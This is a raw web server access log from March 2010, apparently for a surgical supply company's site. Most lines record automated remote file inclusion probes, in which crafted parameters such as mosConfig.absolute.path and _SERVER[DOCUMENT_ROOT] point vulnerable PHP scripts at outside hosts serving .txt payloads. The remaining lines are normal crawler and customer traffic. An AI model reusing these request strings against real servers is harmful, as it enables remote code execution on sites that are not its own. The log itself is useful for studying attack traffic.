82.179.244.70 - - [19/Mar/2010:04:06:34 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:06:34 -0400] "GET /logs/access_log.Q109071600//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:06:34 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:06:34 -0400] "GET /logs/error_log.Q109071600//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:06:44 -0400] "GET /logs/error_log.Q110022200%20%20/board///bbs////////good.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:06:56 -0400] "GET /logs/access_log.Q109110300///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:06:56 -0400] "GET ///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:06:56 -0400] "GET /logs/access_log.Q109091800///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:06:56 -0400] "GET /logs///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:07:03 -0400] "GET /logs/error_log.Q110022200%20%20/board///bbs////////good.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.24.87.113 - - [19/Mar/2010:04:07:03 -0400] "GET /logs/error_log.Q109072100//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
88.255.116.109 - - [19/Mar/2010:04:07:27 -0400] "GET /logs//mygallerybrowser.php?myPath=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.255.116.109 - - [19/Mar/2010:04:07:27 -0400] "GET /logs/access_log.Q109052500%20%20//mygallerybrowser.php?myPath=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.255.116.109 - - [19/Mar/2010:04:07:28 -0400] "GET /logs/access_log.Q110022400%20%20//mygallerybrowser.php?myPath=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:07:36 -0400] "GET ///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:07:36 -0400] "GET /logs/error_log.Q109071800///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:07:36 -0400] "GET /logs///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:07:36 -0400] "GET /logs/access_log.Q109051000///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.251.99.2 - - [19/Mar/2010:04:07:48 -0400] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
125.251.99.2 - - [19/Mar/2010:04:07:48 -0400] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
62.109.16.40 - - [19/Mar/2010:04:07:56 -0400] "GET /logs/access_log.Q110021600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:08:03 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:08:03 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:08:03 -0400] "GET /logs/access_log.Q109113000%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:08:03 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
119.235.237.16 - - [19/Mar/2010:04:08:08 -0400] "GET /logs/error_log.Q109111900 HTTP/1.1" 200 2223291 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
125.243.195.66 - - [19/Mar/2010:04:08:31 -0400] "GET /logs/error_log.Q110021600//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.109.16.40 - - [19/Mar/2010:04:08:40 -0400] "GET /logs/error_log.Q110021600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:08:52 -0400] "GET ///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:08:52 -0400] "GET /logs/access_log.Q109110300%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:08:52 -0400] "GET /logs///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:08:52 -0400] "GET /logs/access_log.Q109091800%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:04:08:42 -0400] "GET /logs/error_log.Q109111400 HTTP/1.0" 200 3759587 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.95.229.230 - - [19/Mar/2010:04:09:34 -0400] "GET /logs/access_log.Q109110300%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:09:34 -0400] "GET ///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:09:34 -0400] "GET /logs/access_log.Q109091800%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:09:34 -0400] "GET /logs///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:09:48 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "-" "Yandex/1.01.001 (compatible; Win16; I)"
114.143.4.130 - - [19/Mar/2010:04:11:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; digit_may2002; msn OptimizedIE8;ENUS)"
114.143.4.130 - - [19/Mar/2010:04:11:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; digit_may2002; msn OptimizedIE8;ENUS)"
114.143.4.130 - - [19/Mar/2010:04:11:15 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; digit_may2002; msn OptimizedIE8;ENUS)"
114.143.4.130 - - [19/Mar/2010:04:11:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; digit_may2002; msn OptimizedIE8;ENUS)"
195.95.229.230 - - [19/Mar/2010:04:11:18 -0400] "GET ///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:18 -0400] "GET /logs///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:18 -0400] "GET /logs/error_log.Q109071800%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:21 -0400] "GET ///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:21 -0400] "GET /logs/error_log.Q109071800%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:21 -0400] "GET /logs///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:27 -0400] "GET /logs/access_log.Q109051000%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.95.229.230 - - [19/Mar/2010:04:11:30 -0400] "GET /logs/access_log.Q109051000%20%20///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://xovex.110mb.com/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:04:11:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.9.14.88 - - [19/Mar/2010:04:11:32 -0400] "GET /logs/error_log.Q109071800%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:04:11:32 -0400] "GET /logs/access_log.Q109050800%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:04:11:32 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:04:11:32 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
66.249.65.53 - - [19/Mar/2010:04:11:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3173E15F4A637000809F09T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.9.14.88 - - [19/Mar/2010:04:11:42 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:04:11:42 -0400] "GET /logs/error_log.Q109071800%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:04:11:42 -0400] "GET /logs/access_log.Q109050800%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:04:11:42 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
125.243.195.66 - - [19/Mar/2010:04:13:41 -0400] "GET /logs/access_log.Q110021600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:04:14:41 -0400] "GET /images/ACE_tutor_1Stage_Ridge.pdf HTTP/1.0" 200 1610345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.243.195.66 - - [19/Mar/2010:04:15:08 -0400] "GET /logs/error_log.Q110021600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/com002/img00.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:15:15 -0400] "GET /logs/error_log.Q109050700 HTTP/1.1" 200 276616 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.247.160.130 - - [19/Mar/2010:04:15:40 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:15:40 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:15:42 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:15:51 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
75.32.34.226 - - [19/Mar/2010:04:17:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5281B55E1CE8B800D27502J+M37+ENG HTTP/1.1" 200 40236 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281B55A16487800DA5502J+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
209.197.232.13 - - [19/Mar/2010:04:17:35 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:17:35 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:17:35 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:17:38 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:17:38 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:17:38 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:17:38 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:17:56 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:17:56 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:17:57 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:18:02 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:18:02 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:18:02 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:18:06 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:08 -0400] "GET /logs//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:08 -0400] "GET //appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:09 -0400] "GET /logs/access_log.Q110021400%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:18:21 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:25 -0400] "GET //appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:25 -0400] "GET /logs//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:25 -0400] "GET /logs/access_log.Q110021400%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:28 -0400] "GET //appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:18:32 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:37 -0400] "GET /logs/access_log.Q110021400//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:37 -0400] "GET //appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:38 -0400] "GET /logs//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:57 -0400] "GET /logs/access_log.Q110021400//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:18:57 -0400] "GET /logs//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:04:19:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.247.160.130 - - [19/Mar/2010:04:19:37 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:37 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:37 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:39 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:39 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:39 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:44 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:19:45 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:20:31 -0400] "GET /logs/error_log.Q109112700 HTTP/1.1" 200 1743207 "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.115.68.164 - - [19/Mar/2010:04:21:21 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:21 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:21 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:21 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:24 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:24 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:24 -0400] "GET /logs/access_log.Q110031100%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:04:21:24 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:21:32 -0400] "GET //appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:21:32 -0400] "GET /logs//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:21:32 -0400] "GET /logs/access_log.Q110021400%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:21:46 -0400] "GET /logs/access_log.Q109122500//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:21:50 -0400] "GET /logs/access_log.Q109122500//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:22:02 -0400] "GET /logs/access_log.Q109122500%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:22:06 -0400] "GET /logs/access_log.Q109122500%20%20//appserv/main.php%20appserv_root=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
66.249.65.53 - - [19/Mar/2010:04:22:35 -0400] "GET /images/items/0034215_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
67.195.114.252 - - [19/Mar/2010:04:22:57 -0400] "GET /logs/error_log.Q109092700 HTTP/1.0" 200 3048218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.247.160.130 - - [19/Mar/2010:04:23:43 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:23:43 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:23:43 -0400] "GET /logs/error_log.Q110020300%20%20/_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
